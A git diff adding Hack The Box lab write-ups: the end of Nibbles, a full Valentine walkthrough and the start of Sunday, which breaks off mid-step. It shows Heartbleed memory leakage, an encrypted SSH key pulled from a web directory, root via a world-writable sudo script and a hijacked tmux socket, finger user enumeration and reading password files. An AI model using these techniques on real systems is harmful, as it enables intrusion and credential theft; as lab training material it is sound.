+ cd personal/stuff
+
+ nibbler@Nibbles:/home/nibbler/personal/stuff$ ls
+ ls
+ monitor.sh
+
+ nibbler@Nibbles:/home/nibbler/personal/stuff$ ls -l
+ ls -l
+ total 4
+ -rwxrwxrwx 1 nibbler nibbler 4015 May 8 2015 monitor.sh
+
+
+Here is our opportunity ! the monitor.sh script has got the 777 permissions, meaning that we can run commands of our choice within that script, with root permissions. We will try to print out the root flag by writing into the script the cat command.
+
+
+ nibbler@Nibbles:/home/nibbler/personal/stuff$ cat /root/root.txt
+ cat: /root/root.txt: Permission denied
+
+ nibbler@Nibbles:/home/nibbler/personal/stuff$ echo "cat /root/root.txt" > monitor.sh
+ echo "cat /root/root.txt" > monitor.sh
+
+ nibbler@Nibbles:/home/nibbler/personal/stuff$ sudo -u root ./monitor.sh
+ sudo -u root ./monitor.sh
+ sudo: unable to resolve host Nibbles: Connection timed out
+ b6XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And that's it ! We have been able to print out the root flag.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
diff --git a/Easy/17.md b/Easy/17.md
new file mode 100644
index 0000000..12d1367
--- /dev/null
+++ b/Easy/17.md
@@ -0,0 +1,409 @@
+# Valentine Writeup
+
+
+
+## Introduction :
+
+Valentine is an easy Linux box that was released back in Febuary 2018. It features a popular CVE called Heartbleed.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [~] → nmap -sC -sV 10.10.10.79
+ Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-20 18:09 CET
+ Nmap scan report for 10.10.10.79
+ Host is up (0.046s latency).
+ Not shown: 997 closed ports
+ PORT STATE SERVICE VERSION
+ 22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
+ | ssh-hostkey:
+ | 1024 96:4c:51:42:3c:ba:22:49:20:4d:3e:ec:90:cc:fd:0e (DSA)
+ | 2048 46:bf:1f:cc:92:4f:1d:a0:42:b3:d2:16:a8:58:31:33 (RSA)
+ |_ 256 e6:2b:25:19:cb:7e:54:cb:0a:b9:ac:16:98:c6:7d:a9 (ECDSA)
+ 80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
+ |_http-server-header: Apache/2.2.22 (Ubuntu)
+ |_http-title: Site doesn't have a title (text/html).
+ 443/tcp open ssl/http Apache httpd 2.2.22 ((Ubuntu))
+ |_http-server-header: Apache/2.2.22 (Ubuntu)
+ |_http-title: Site doesn't have a title (text/html).
+ | ssl-cert: Subject: commonName=valentine.htb/organizationName=valentine.htb/stateOrProvinceName=FL/countryName=US
+ | Not valid before: 2018-02-06T00:45:25
+ |_Not valid after: 2019-02-06T00:45:25
+ |_ssl-date: 2019-11-20T17:09:42+00:00; +10s from scanner time.
+ Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
+
+ Host script results:
+ |_clock-skew: 9s
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 16.74 seconds
+
+
+
+
+ λ nihilist [ 10.10.14.48/23 ] [~] → sslscan 10.10.10.79
+ _
+ ___ ___| |___ ___ __ _ _ __
+ / __/ __| / __|/ __/ _ | _ \
+ \__ \__ \ \__ \ (_| (_| | | | |
+ |___/___/_|___/\___\__,_|_| |_|
+
+ sslscan version 1.10.2
+ OpenSSL 1.0.2t 10 Sep 2019
+
+
+ Testing SSL server 10.10.10.79 on port 443
+
+
+ Preferred Server Cipher(s):
+ TLSv1 256 bits ECDHE-RSA-AES256-SHA
+ TLS11 256 bits ECDHE-RSA-AES256-SHA
+ TLS12 256 bits ECDHE-RSA-AES256-GCM-SHA384
+
+ SSL Certificate:
+ Certificate blob:
+ -----BEGIN CERTIFICATE-----
+ MIIDZzCCAk+gAwIBAgIJAIXsbfXFhLHyMA0GCSqGSIb3DQEBBQUAMEoxCzAJBgNV
+ BAYTAlVTMQswCQYDVQQIDAJGTDEWMBQGA1UECgwNdmFsZW50aW5lLmh0YjEWMBQG
+ A1UEAwwNdmFsZW50aW5lLmh0YjAeFw0xODAyMDYwMDQ1MjVaFw0xOTAyMDYwMDQ1
+ MjVaMEoxCzAJBgNVBAYTAlVTMQswCQYDVQQIDAJGTDEWMBQGA1UECgwNdmFsZW50
+ aW5lLmh0YjEWMBQGA1UEAwwNdmFsZW50aW5lLmh0YjCCASIwDQYJKoZIhvcNAQEB
+ BQADggEPADCCAQoCggEBAMMoF6z4GSpB0oo/znkcGfT7SPrTLzNrb8ic+aO/GWao
+ oY35ImIO4Z5FUB9ZL6y6lc+vI6pUyWRADyWoxd3LxByHDNJzEi53ds+JSPs5SuH1
+ PUDDtZqCaPaNjLJNP08DCcC6rXRdU2SwV2pEDx+39vsFiK6ywcrepvvFZndGKXVg
+ 0K+R3VkwOguPhSHlXcgiHFbqei8NJ1zip9YuVUYXhyLVG2ZiJYX6CRw4bRsUnql6
+ 4DFNQybOsJHm0JtI2M9PefmvEkTUZeT/d0dWhU076a3bTestKZf4WpqZw60XGmxz
+ pAQf5dWOqMemIK6K4FC48bLSSN59s4kNtuhtx6OCXpcCAwEAAaNQME4wHQYDVR0O
+ BBYEFNzWWyJscuATyFWyfLR2Yev1T435MB8GA1UdIwQYMBaAFNzWWyJscuATyFWy
+ fLR2Yev1T435MAwGA1UdEwQFMAMBAf8wDQYJKoZIhvcNAQEFBQADggEBACc3NjB7
+ cHUXjTxwdeFxkY0EFYPPy3EiHftGVLpiczrEQ7NiHTLGQ6apvxdlShBBhKWRaU+N
+ XGhsDkvBLUWJ3DSWwWM4pG9qmWPT241OCaaiIkVT4KcjRIc+x+91GWYNQvvdnFLO
+ 5CfrRGkFHwJT1E6vGXJejx6nhTmis88ByQ9g9D2NgcHENfQPAW1by7ONkqiXtV3S
+ q56X7q0yLQdSTe63dEzK8eSTN1KWUXDoNRfAYfHttJqKg2OUqUDVWkNzmUiIe4sP
+ csAwIHShdX+Jd8E5oty5C07FJrzVtW+Yf4h8UHKLuJ4E8BYbkxkc5vDcXnKByeJa
+ gRSFfyZx/VqBh9c=
+ -----END CERTIFICATE-----
+ Version: 2
+ Serial Number: 85:ec:6d:f5:c5:84:b1:f2
+ Signature Algorithm: sha1WithRSAEncryption
+ Issuer: /C=US/ST=FL/O=valentine.htb/CN=valentine.htb
+ Not valid before: Feb 6 00:45:25 2018 GMT
+ Not valid after: Feb 6 00:45:25 2019 GMT
+ Subject: /C=US/ST=FL/O=valentine.htb/CN=valentine.htb
+ Public Key Algorithm: rsaEncryption
+ RSA Public Key: (2048 bit)
+ Public-Key: (2048 bit)
+ Modulus:
+ 00:c3:28:17:ac:f8:19:2a:41:d2:8a:3f:ce:79:1c:
+ 19:f4:fb:48:fa:d3:2f:33:6b:6f:c8:9c:f9:a3:bf:
+ 19:66:a8:a1:8d:f9:22:62:0e:e1:9e:45:50:1f:59:
+ 2f:ac:ba:95:cf:af:23:aa:54:c9:64:40:0f:25:a8:
+ c5:dd:cb:c4:1c:87:0c:d2:73:12:2e:77:76:cf:89:
+ 48:fb:39:4a:e1:f5:3d:40:c3:b5:9a:82:68:f6:8d:
+ 8c:b2:4d:3f:4f:03:09:c0:ba:ad:74:5d:53:64:b0:
+ 57:6a:44:0f:1f:b7:f6:fb:05:88:ae:b2:c1:ca:de:
+ a6:fb:c5:66:77:46:29:75:60:d0:af:91:dd:59:30:
+ 3a:0b:8f:85:21:e5:5d:c8:22:1c:56:ea:7a:2f:0d:
+ 27:5c:e2:a7:d6:2e:55:46:17:87:22:d5:1b:66:62:
+ 25:85:fa:09:1c:38:6d:1b:14:9e:a9:7a:e0:31:4d:
+ 43:26:ce:b0:91:e6:d0:9b:48:d8:cf:4f:79:f9:af:
+ 12:44:d4:65:e4:ff:77:47:56:85:4d:3b:e9:ad:db:
+ 4d:eb:2d:29:97:f8:5a:9a:99:c3:ad:17:1a:6c:73:
+ a4:04:1f:e5:d5:8e:a8:c7:a6:20:ae:8a:e0:50:b8:
+ f1:b2:d2:48:de:7d:b3:89:0d:b6:e8:6d:c7:a3:82:
+ 5e:97
+ Exponent: 65537 (0x10001)
+ X509v3 Extensions:
+ X509v3 Subject Key Identifier:
+ DC:D6:5B:22:6C:72:E0:13:C8:55:B2:7C:B4:76:61:EB:F5:4F:8D:F9
+ X509v3 Authority Key Identifier:
+ keyid:DC:D6:5B:22:6C:72:E0:13:C8:55:B2:7C:B4:76:61:EB:F5:4F:8D:F9
+
+ X509v3 Basic Constraints:
+ CA:TRUE
+ Verify Certificate:
+ self signed certificate
+
+
+
+## **Part 2 : Getting User Access**
+
+Port 80 seems to be running Apache 2.2.22, let's run the dirbuster command to try and find out what are the directories we can find.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [~] → dirb http://10.10.10.79/
+
+ -----------------
+ DIRB v2.22
+ By The Dark Raver
+ -----------------
+
+ START_TIME: Wed Nov 20 18:14:59 2019
+ URL_BASE: http://10.10.10.79/
+ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
+
+ -----------------
+
+ GENERATED WORDS: 4612
+
+ ---- Scanning URL: http://10.10.10.79/ ----
+ + http://10.10.10.79/cgi-bin/ (CODE:403|SIZE:287)
+ + http://10.10.10.79/decode (CODE:200|SIZE:552)
+ ==> DIRECTORY: http://10.10.10.79/dev/
+ + http://10.10.10.79/encode (CODE:200|SIZE:554)
+ + http://10.10.10.79/index (CODE:200|SIZE:38)
+ + http://10.10.10.79/index.php (CODE:200|SIZE:38)
+ + http://10.10.10.79/server-status (CODE:403|SIZE:292)
+
+ ---- Entering directory: http://10.10.10.79/dev/ ----
+ (!) WARNING: Directory IS LISTABLE. No need to scan it.
+ (Use mode '-w' if you want to scan it anyway)
+
+ -----------------
+ END_TIME: Wed Nov 20 18:18:00 2019
+ DOWNLOADED: 4612 - FOUND: 6
+
+
+
+According to dirb, /dev seems to be listable. Let's fire up a web browser to check it.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [~] → lynx http://10.10.10.79/
+
+
+ 
+
+We seem to have found a key however it seems to be hexadecimal-encoded. We will first use the curl command with the -s and -k flags to download the encoded key. Then we will use the xxd command with the -r and -p flags to convert the key from hexadecimal to it's original ascii charcaters.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Valentine] → curl -sk http://10.10.10.79/dev/hype_key > hype_key
+
+ λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Valentine] → cat hype_key | xxd -r -p
+ -----BEGIN RSA PRIVATE KEY-----
+ Proc-Type: 4,ENCRYPTED
+ DEK-Info: AES-128-CBC,AEB88C140F69BF2074788DE24AE48D46
+
+ DbPrO78kegNuk1DAqlAN5jbjXv0PPsog3jdbMFS8iE9p3UOL0lF0xf7PzmrkDa8R
+ 5y/b46+9nEpCMfTPhNuJRcW2U2gJcOFH+9RJDBC5UJMUS1/gjB/7/My00Mwx+aI6
+ 0EI0SbOYUAV1W4EV7m96QsZjrwJvnjVafm6VsKaTPBHpugcASvMqz76W6abRZeXi
+ Ebw66hjFmAu4AzqcM/kigNRFPYuNiXrXs1w/deLCqCJ+Ea1T8zlas6fcmhM8A+8P
+ OXBKNe6l17hKaT6wFnp5eXOaUIHvHnvO6ScHVWRrZ70fcpcpimL1w13Tgdd2AiGd
+ pHLJpYUII5PuO6x+LS8n1r/GWMqSOEimNRD1j/59/4u3ROrTCKeo9DsTRqs2k1SH
+ QdWwFwaXbYyT1uxAMSl5Hq9OD5HJ8G0R6JI5RvCNUQjwx0FITjjMjnLIpxjvfq+E
+ p0gD0UcylKm6rCZqacwnSddHW8W3LxJmCxdxW5lt5dPjAkBYRUnl91ESCiD4Z+uC
+ Ol6jLFD2kaOLfuyee0fYCb7GTqOe7EmMB3fGIwSdW8OC8NWTkwpjc0ELblUa6ulO
+ t9grSosRTCsZd14OPts4bLspKxMMOsgnKloXvnlPOSwSpWy9Wp6y8XX8+F40rxl5
+ XqhDUBhyk1C3YPOiDuPOnMXaIpe1dgb0NdD1M9ZQSNULw1DHCGPP4JSSxX7BWdDK
+ aAnWJvFglA4oFBBVA8uAPMfV2XFQnjwUT5bPLC65tFstoRtTZ1uSruai27kxTnLQ
+ +wQ87lMadds1GQNeGsKSf8R/rsRKeeKcilDePCjeaLqtqxnhNoFtg0Mxt6r2gb1E
+ AloQ6jg5Tbj5J7quYXZPylBljNp9GVpinPc3KpHttvgbptfiWEEsZYn5yZPhUr9Q
+ r08pkOxArXE2dj7eX+bq65635OJ6TqHbAlTQ1Rs9PulrS7K4SLX7nY89/RZ5oSQe
+ 2VWRyTZ1FfngJSsv9+Mfvz341lbzOIWmk7WfEcWcHc16n9V0IbSNALnjThvEcPky
+ e1BsfSbsf9FguUZkgHAnnfRKkGVG1OVyuwc/LVjmbhZzKwLhaZRNd8HEM86fNojP
+ 09nVjTaYtWUXk0Si1W02wbu1NzL+1Tg9IpNyISFCFYjSqiyG+WU7IwK3YU5kp3CC
+ dYScz63Q2pQafxfSbuv4CMnNpdirVKEo5nRRfK/iaL3X1R3DxV8eSYFKFL6pqpuX
+ cY5YZJGAp+JxsnIQ9CFyxIt92frXznsjhlYa8svbVNNfk/9fyX6op24rL2DyESpY
+ pnsukBCFBkZHWNNyeN7b5GhTVCodHhzHVFehTuBrp+VuPqaqDvMCVe1DZCb4MjAj
+ Mslf+9xK+TXEL3icmIOBRdPyw6e/JlQlVRlmShFpI8eb/8VsTyJSe+b853zuV2qL
+ suLaBMxYKm3+zEDIDveKPNaaWZgEcqxylCC/wUyUXlMJ50Nw6JNVMM8LeCii3OEW
+ l0ln9L1b/NXpHjGa8WHHTjoIilB5qNUyywSeTBF2awRlXH9BrkZG4Fc4gdmW/IzT
+ RUgZkbMQZNIIfzj1QuilRVBm/F76Y/YMrmnM9k/1xSGIskwCUQ+95CGHJE8MkhD3
+ -----END RSA PRIVATE KEY-----
+
+ λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Valentine] → cat hype_key | xxd -r -p > Hype.ssh.key
+
+
+Now we have decrypted the hype ssh key and saved it locally as "Hype.ssh.key" As a side note, the header of the ssh key says "Proc-Type" and "DEK-Info" which means that we will probably need a passphrase for the key. When we open the browser at the URL http://10.10.10.79/ we are greeted with an image that is an analogy to the Heartbleed Vulnerability. Let's test if this machine is vulnerable to the well-known Heartbleed vulnerability [(CVE-2014-0160)](https://www.us-cert.gov/ncas/alerts/TA14-098A). To do so we will first off download the according python script heartbleed.py and check how to use it.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Valentine] → curl -sk https://gist.githubusercontent.com/eelsivart/10174134/raw/8aea10b2f0f6842ccff97ee921a836cf05cd7530/heartbleed.py > heartbleed.py
+
+ λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Valentine] → nano heartbleed.py
+
+
+We will run the command using python2 and with the -n flag in order to increase our attempts at getting information from the machine.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Valentine] → python2 heartbleed.py 10.10.10.79 -n 201
+
+ defribulator v1.16
+ A tool to test and exploit the TLS heartbeat vulnerability aka heartbleed (CVE-2014-0160)
+
+ ##################################################################
+ Connecting to: 10.10.10.79:443, 201 times
+ Sending Client Hello for TLSv1.0
+ Received Server Hello for TLSv1.0
+
+ WARNING: 10.10.10.79:443 returned more data than it should - server is vulnerable!
+ Please wait... connection attempt 201 of 201
+ ##################################################################
+ ).(B...}.@....SC[...r....+..H...9...BlCg==
+ ....w.3....f...
+ ...!.9.8.........5...............
+ .........3.2.....E.D...../...A.................................I.........
+ ...........
+ ...................................#.@....SC[...r....+..H...9...
+ ....w.3....f...
+ ...!.9.8.........5...............
+ .........3.2.....E.D...../...A.................................I.........
+ ...........
+ ...................................#.@....SC[...r....+..H...9...
+ ....w.3....f...
+ ...!.9.8.........5...............
+ .........3.2.....E.D...../...A.................................I.........
+ ...........
+ ...................................#.@....SC[...r....+..H...9...
+ ....w.3....f...
+ ...!.9.8.........5...............
+ .........3.2.....E.D...../...A.................................I.........
+ ...........
+ ...................................#.@....SC[...r....+..H...9...
+ ....w.3....f...
+ ...!.9.8.........5...............
+ .........3.2.....E.D...../...A.................................I.........
+ ...........
+ ...................................#.......0.0.1/decode.php
+ Content-Type: application/x-www-form-urlencoded
+ Content-Length: 42
+
+ $text=**aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg==**
+
+
+Looking at the results we see that it seems to have returned us a base64-encoded string. We will use the base64 command with the -d flag to decode the encoded string.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Valentine] → echo "aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg==" | base64 -d
+ heartbleedbelievethehype
+
+
+Now we will try to log onto the box through the ssh service using our decrypted Hype.ssh.key along with the passphrase "heartbleedbelievethehype"
+
+
+ λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Valentine] → ssh -i Hype.ssh.key hype@10.10.10.79
+ The authenticity of host '10.10.10.79 (10.10.10.79)' cant be established.
+ ECDSA key fingerprint is SHA256:lqH8pv30qdlekhX8RTgJTq79ljYnL2cXflNTYu8LS5w.
+ Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
+ Warning: Permanently added '10.10.10.79' (ECDSA) to the list of known hosts.
+ @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
+ @ WARNING: UNPROTECTED PRIVATE KEY FILE! @
+ @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
+ Permissions 0644 for 'Hype.ssh.key' are too open.
+ It is required that your private key files are NOT accessible by others.
+ This private key will be ignored.
+ Load key "Hype.ssh.key": bad permissions
+
+
+Let's not forget to change the permissions of the SSH key to 600 _(read+write for root and nothing for groups + user)_
+
+
+ λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Valentine] → ssh -i Hype.ssh.key hype@10.10.10.79
+ Enter passphrase for key 'Hype.ssh.key':
+ Welcome to Ubuntu 12.04 LTS (GNU/Linux 3.2.0-23-generic x86_64)
+
+ * Documentation: https://help.ubuntu.com/
+
+ New release '14.04.5 LTS' available.
+ Run 'do-release-upgrade' to upgrade to it.
+
+ Last login: Fri Feb 16 14:50:29 2018 from 10.10.14.3
+ hype@Valentine:~$ uname -a
+ Linux Valentine 3.2.0-23-generic #36-Ubuntu SMP Tue Apr 10 20:39:51 UTC 2012 x86_64 x86_64 x86_64 GNU/Linux
+
+ hype@Valentine:~$ cat /home/hype/Desktop/user.txt
+ e6XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+We have been able to print out the flag user, the combination of the SSH key and it's passphrase gave us access to the machine, which logged us as the "hype" user.
+
+## **Part 3 : Getting Root Access**
+
+In order to escalate privileges we will first have to take a look at what we can work with, starting with the .bash_history file.
+
+
+ hype@Valentine:~$ cat .bash_history
+
+ exit
+ exot
+ exit
+ ls -la
+ cd /
+ ls -la
+ cd .devs
+ ls -la
+ tmux -L dev_sess
+ tmux a -t dev_sess
+ tmux --help
+ tmux -S /.devs/dev_sess
+ exit
+
+
+
+seems like the user hype was working with something within a hidden devs directory. Just like in the .bash_history file we will use the ls command with the -a flag in order to list the hidden files and then navigate our way in.
+
+
+ hype@Valentine:~$ cd /
+ hype@Valentine:/$ ls -la
+ total 108
+ drwxr-xr-x 26 root root 4096 Feb 6 2018 .
+ drwxr-xr-x 26 root root 4096 Feb 6 2018 ..
+ drwxr-xr-x 2 root root 4096 Dec 11 2017 bin
+ drwxr-xr-x 3 root root 4096 Feb 16 2018 boot
+ drwxr-xr-x 2 root root 4096 Dec 11 2017 cdrom
+ drwxr-xr-x 13 root root 4060 Nov 20 09:07 dev
+ drwxr-xr-x 2 root root 4096 Dec 13 2017 devs
+ drwxr-xr-x 2 root hype 4096 Nov 20 09:07 .devs
+ drwxr-xr-x 132 root root 12288 Nov 20 09:07 etc
+ drwxr-xr-x 3 root root 4096 Dec 11 2017 home
+ lrwxrwxrwx 1 root root 32 Dec 11 2017 initrd.img -> boot/initrd.img-3.2.0-23-generic
+ drwxr-xr-x 21 root root 4096 Dec 11 2017 lib
+ drwxr-xr-x 2 root root 4096 Apr 25 2012 lib64
+ drwx------ 2 root root 16384 Dec 11 2017 lost+found
+ drwxr-xr-x 3 root root 4096 Apr 25 2012 media
+ drwxr-xr-x 3 root root 4096 Dec 11 2017 mnt
+ drwx------ 2 root root 4096 Dec 13 2017 opt
+ dr-xr-xr-x 92 root root 0 Nov 20 09:07 proc
+ drwx------ 4 root root 4096 Feb 6 2018 root
+ drwxr-xr-x 20 root root 740 Nov 20 10:02 run
+ drwxr-xr-x 2 root root 4096 Feb 16 2018 sbin
+ drwxr-xr-x 2 root root 4096 Mar 5 2012 selinux
+ drwxr-xr-x 2 root root 4096 Apr 25 2012 srv
+ drwxr-xr-x 13 root root 0 Nov 20 09:07 sys
+ drwxrwxrwt 5 root root 4096 Nov 20 10:08 tmp
+ drwxr-xr-x 10 root root 4096 Apr 25 2012 usr
+ drwxr-xr-x 14 root root 4096 Feb 6 2018 var
+ lrwxrwxrwx 1 root root 29 Dec 11 2017 vmlinuz -> boot/vmlinuz-3.2.0-23-generic
+ hype@Valentine:/$ cd .devs
+ hype@Valentine:/.devs$ ls
+ dev_sess
+
+
+let's simply reproduce the steps that hype was doing, which apparently was an attempt at attaching the socket to the dev_sess file
+
+
+ hype@Valentine:/.devs$ ls -l
+ total 0
+ srw-rw---- 1 root hype 0 Nov 20 09:07 dev_sess
+
+
+it seems like the dev_sess file is owned by root, let's attach the tmux session ourselves, and it should give us a root shell.
+
+
+ hype@Valentine:/.devs$ tmux -S dev_sess
+
+ root@Valentine:/.devs# id
+ uid=0(root) gid=0(root) groups=0(root)
+
+ root@Valentine:/.devs# cat /root/root.txt
+ f1XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And that's it ! we have been able to print out the root flag.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
diff --git a/Easy/18.md b/Easy/18.md
new file mode 100644
index 0000000..6a7c0ee
--- /dev/null
+++ b/Easy/18.md
@@ -0,0 +1,316 @@
+# Sunday Writeup
+
+
+
+## Introduction :
+
+Sunday is an easy Solaris box that was released back in April 2018.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ **λ nihilist [ 10.10.14.48/23 ] [~] → nmap -sC -sV -Pn 10.10.10.76**
+ Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-18 05:36 CET
+ Stats: 0:01:57 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
+ NSE Timing: About 75.00% done; ETC: 05:38 (0:00:00 remaining)
+ Nmap scan report for 10.10.10.76
+ Host is up (0.037s latency).
+ Not shown: 991 closed ports
+ PORT STATE SERVICE VERSION
+ **79/tcp open finger Sun Solaris fingerd
+ |_finger: No one logged on\x0D**
+ 111/tcp open rpcbind
+ 765/tcp filtered webster
+ 1839/tcp filtered netopia-vo1
+ 1998/tcp filtered x25-svc-port
+ 2910/tcp filtered tdaccess
+ 9011/tcp filtered d-star
+ 16018/tcp filtered unknown
+ 54045/tcp filtered unknown
+ Service Info: OS: Solaris; CPE: cpe:/o:sun:sunos
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 117.78 seconds
+
+
+Seems like we have alot of ports to work with. let's run another nmap scan, but this time to enumerate all the 65535 ports.
+
+
+ **λ nihilist [ 10.10.14.48/23 ] [~] → nmap -T4 -A -v -p- 10.10.10.76**
+ Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-18 05:37 CET
+ NSE: Loaded 151 scripts for scanning.
+ NSE: Script Pre-scanning.
+ Initiating NSE at 05:37
+ Completed NSE at 05:37, 0.00s elapsed
+ Initiating NSE at 05:37
+ Completed NSE at 05:37, 0.00s elapsed
+ Initiating NSE at 05:37
+ Completed NSE at 05:37, 0.00s elapsed
+ Initiating Ping Scan at 05:37
+ Scanning 10.10.10.76 [2 ports]
+ Completed Ping Scan at 05:37, 0.03s elapsed (1 total hosts)
+ Initiating Parallel DNS resolution of 1 host. at 05:37
+ Completed Parallel DNS resolution of 1 host. at 05:37, 0.01s elapsed
+ Initiating Connect Scan at 05:37
+ Scanning 10.10.10.76 [65535 ports]
+ Discovered open port 111/tcp on 10.10.10.76
+ Increasing send delay for 10.10.10.76 from 0 to 5 due to 197 out of 492 dropped probes since last increase.
+ Increasing send delay for 10.10.10.76 from 5 to 10 due to max_successful_tryno increase to 5
+ Warning: 10.10.10.76 giving up on port because retransmission cap hit (6).
+ Connect Scan Timing: About 1.74% done; ETC: 06:07 (0:29:08 remaining)
+ Connect Scan Timing: About 3.72% done; ETC: 06:05 (0:26:17 remaining)
+ Connect Scan Timing: About 8.36% done; ETC: 06:04 (0:24:51 remaining)
+ Connect Scan Timing: About 12.54% done; ETC: 06:04 (0:23:29 remaining)
+ Connect Scan Timing: About 17.15% done; ETC: 06:04 (0:22:04 remaining)
+ Connect Scan Timing: About 21.93% done; ETC: 06:04 (0:20:43 remaining)
+ Connect Scan Timing: About 27.43% done; ETC: 06:04 (0:19:21 remaining)
+ Connect Scan Timing: About 32.63% done; ETC: 06:04 (0:18:00 remaining)
+ Connect Scan Timing: About 37.81% done; ETC: 06:04 (0:16:38 remaining)
+ **Discovered open port 22022/tcp on 10.10.10.76
+ Discovered open port 33890/tcp on 10.10.10.76**
+ Connect Scan Timing: About 43.04% done; ETC: 06:04 (0:15:15 remaining)
+ Connect Scan Timing: About 48.19% done; ETC: 06:04 (0:13:53 remaining)
+ Connect Scan Timing: About 53.48% done; ETC: 06:04 (0:12:33 remaining)
+
+
+We have found the 22022nd and 33890th port, let's run yet another scan on these two ports to discover what service they are hosting.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [~] → nmap -sC -sV 10.10.10.76 -p 22022,33890
+ Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-20 09:15 CET
+ Nmap scan report for 10.10.10.76
+ Host is up (0.085s latency).
+
+ PORT STATE SERVICE VERSION
+ **22022/tcp open ssh SunSSH 1.3 (protocol 2.0)**
+ 33890/tcp closed unknown
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 35.14 seconds
+
+
+Seems like we have a SSH port to work with ! it is running the SunSSH 1.3 protocol.
+we will also be looking at the 79th port : fingerd Solaris.
+
+## **Part 2 : Getting User Access**
+
+Let's see what we can do with the 79th port that is running fingerd Solaris. We will be running the finger enumeration script by pentestmonkey : http://pentestmonkey.net/tools/user-enumeration/finger-user-enum
+
+
+ λ root [ 10.10.14.48/23 ] [_HTB/Sunday/finger-user-enum-1.0] → perl finger-user-enum.pl -U rockyou.txt -t 10.10.10.76
+
+ ######## Scan started at Wed Nov 20 09:58:10 2019 #########
+ **sammy** @10.10.10.76: sammy pts/2 10.10.14.48
+ **sunny** @10.10.10.76: sunny pts/3 10.10.14.48
+
+
+We now have 2 users to work with ! sammy and sunny
+
+
+ λ root [ 10.10.14.48/23 ] [_HTB/Sunday/finger-user-enum-1.0] → **ssh sunny@10.10.10.76 -p 22022**
+ Unable to negotiate with 10.10.10.76 port 22022: no matching key exchange method found. Their offer: gss-group1-sha1-toWM5Slw5Ew8Mqkay+al2g==,diffie-hellman-group-exchange-sha1,**diffie-hellman-group1-sha1**
+
+
+We need to allow a ssh key algorithm exchange method to the 10.10.10.76 host into our ~/.ssh/config file.
+
+
+ λ root [ 10.10.14.48/23 ] [_HTB/Sunday/finger-user-enum-1.0] → echo "**Host 10.10.10.76** " >> ~/.ssh/config
+
+ λ root [ 10.10.14.48/23 ] [_HTB/Sunday/finger-user-enum-1.0] → echo "**KexAlgorithms +diffie-hellman-group1-sha1** " >> ~/.ssh/config
+
+ λ root [ 10.10.14.48/23 ] [_HTB/Sunday/finger-user-enum-1.0] → **ssh sunny@10.10.10.76 -p 22022**
+ The authenticity of host '[10.10.10.76]:22022 ([10.10.10.76]:22022)' cant be established.
+ RSA key fingerprint is SHA256:TmRO9yKIj8Rr/KJIZFXEVswWZB/hic/jAHr78xGp+YU.
+ Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
+ Warning: Permanently added '[10.10.10.76]:22022' (RSA) to the list of known hosts.
+ Password:
+ Last login: Tue Apr 24 10:48:11 2018 from 10.10.14.4
+ Sun Microsystems Inc. **SunOS 5.11** snv_111b November 2008
+
+
+We see that the box is running SunOS 5.11, which is preety old, now we know why we needed to enable the old ssh algorithms for the client.
+
+
+ sunny@sunday:~$ cat /
+ cat: /: Is a directory
+ sunny@sunday:~$ CLEAR
+ -bash: CLEAR: command not found
+ sunny@sunday:~$
+ sunny@sunday:~$ cat /home/sunny/user.txt
+
+
+Here we see that the box is awfully slow and unresponsive.
+
+
+ sunny@sunday:~/Desktop$ cd /export/home/sammy
+ sunny@sunday:/export/home/sammy$ ls
+ Desktop Documents Downloads Public
+ sunny@sunday:/export/home/sammy$ cd Desktop
+ sunny@sunday:/export/home/sammy/Desktop$ ls
+ user.txt
+ sunny@sunday:/export/home/sammy/Desktop$ cat user.txt
+ cat: user.txt: Permission denied
+
+
+Navigating to /export/home/sammy/desktop we see that we do not have permissions to read user.txt Our next step is to try to print out /etc/passwd and /backup/shadow.backup
+
+
+ **sunny@sunday:/export/home/sammy/Desktop$ cat user.txt**
+ cat: user.txt: Permission denied
+
+ **sunny@sunday:/export/home/sammy/Desktop$ cat /etc/passwd**
